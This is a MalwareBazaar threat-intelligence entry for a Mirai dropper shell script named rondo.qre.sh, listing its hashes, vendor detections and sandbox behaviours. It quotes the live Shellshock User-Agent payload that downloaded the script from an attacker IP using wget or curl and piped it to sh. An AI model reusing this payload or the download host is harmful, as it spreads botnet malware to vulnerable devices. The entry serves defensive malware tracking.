MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 4d6062140b854344d53bcdbbc1137d21e65d043adf92972fefddd2cc765d56e5. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

SHA256 hash:	4d6062140b854344d53bcdbbc1137d21e65d043adf92972fefddd2cc765d56e5
SHA3-384 hash:	aa231e07f48ecb6de61478b2278a1bfede0db4421593a4c570e3e5e1e22268095905290fc2889b938f8324d2c6fe8aae
SHA1 hash:	4a774bff25f306b06b338285db42aa4bce36d0c9
MD5 hash:	840ea31b7ad62556ff48f95048f671ed
humanhash:	spring-black-kentucky-purple
File name:	rondo.qre.sh
Download:	download sample
Signature	Mirai Alert Create hunting rule
File size:	9'212 bytes
First seen:	2025-12-17 15:57:53 UTC
Last seen:	Never
File type:	sh
MIME type:	text/x-shellscript
ssdeep	96:hiRoLngDpQ75uQ7QWQ7AQ75Q7eQ7DQ7oQ7TpQ71Q7CQ7jQ7RQ7NQ7hQ73kQ79fQO:hgoLngKd7edK/wl+2jA6OahhoI3
TLSH	T1E312B2C831C402FA6894C4A611F7827CCD0489E4E1A7DDB2E86C6DB69F7C6B8706D79D
TrID	70.0% (.SH) Linux/UNIX shell script (7000/1) 30.0% (.) Unix-like shebang (var.3) (gen) (3000/1)
Magika	shell
Reporter	ngvcanh2014
Tags:	arm dropper elf mips mirai rondo sh x86

ngvcanh

User-Agent contain

() { :; }; /bin/bash -c \x22(wget -qO- http://41.231.37.153/rondo.qre.sh||busybox wget -qO- http://41.231.37.153/rondo.qre.sh||curl -s http://41.231.37.153/rondo.qre.sh)|sh\x22& # rondo2012@atomicmail.io

Intelligence

---

File Origin

# of uploads :

1

# of downloads :

63

Origin country :

VN

Vendor Threat Intelligence

ACCE Unknown

No detections

ClamAV Detected

Detection(s):

URLhaus.3729149.UNOFFICIAL

Alert

Create hunting rule

FileScan.IO Malicious

Verdict:

Malicious

Threat level:

  10/10

Confidence:

100%

Tags:

busybox masquerade

Link:

https://www.filescan.io/uploads/6942d30e3f8fdbf8e9499150/reports/4828896e-48b2-4755-9558-8be6ee5ee344/overview

Kaspersky OpenTIP Clean

Verdict:

Clean

File Type:

unix shell

Link:

https://opentip.kaspersky.com/4d6062140b854344d53bcdbbc1137d21e65d043adf92972fefddd2cc765d56e5/results?tab=lookup

Kunai Sandbox

Status:

Failed

Link:

https://sandbox.kunai.rocks/analysis/5026f675-9291-4e88-96f6-48716d54ee15

Nucleon Malprob Malware

Score:

100%

Verdict:

Malware

File Type:

SCRIPT

Link:

https://malprob.io/report/4d6062140b854344d53bcdbbc1137d21e65d043adf92972fefddd2cc765d56e5

CERT.PL MWDB

Detection:

n/a

Link:

https://mwdb.cert.pl/sample/4d6062140b854344d53bcdbbc1137d21e65d043adf92972fefddd2cc765d56e5/

Neiki Clean

Verdict:

Clean

Link:

https://tip.neiki.dev/file/4d6062140b854344d53bcdbbc1137d21e65d043adf92972fefddd2cc765d56e5

Spamhaus Hash Blocklist Suspicious file

Detection(s):

Suspicious file

Link:

https://check.spamhaus.org/check/?searchterm=jvqgefalqvbujvj3zw54ce35ehtf2bb236jjol7p3xjmy5s5k3sq._file

Hatching Triage Suspicious

Result

Malware family:

n/a

Score:

  7/10

Tags:

defense_evasion discovery linux persistence privilege_escalation

Link:

https://tria.ge/reports/251217-tejjaszkfm/

Behaviour

Enumerates kernel/hardware configuration

Reads runtime system information

System Network Configuration Discovery

Writes file to shm directory

Writes file to tmp directory

Reads CPU attributes

Abuse Elevation Control Mechanism: Sudo and Sudo Caching

Deletes log files

Disables AppArmor

Disables SELinux

Enumerates running processes

Write file to user bin folder

Writes file to system bin folder

File and Directory Permissions Modification

VirusTotal

Please note that we are no longer able to provide a coverage score for Virus Total.

YOROI YOMI Suspicious File

Threat name:

Suspicious File

Score:

0.31

Link:

https://yomi.yoroi.company/submissions/4d6062140b854344d53bcdbbc1137d21e65d043adf92972fefddd2cc765d56e5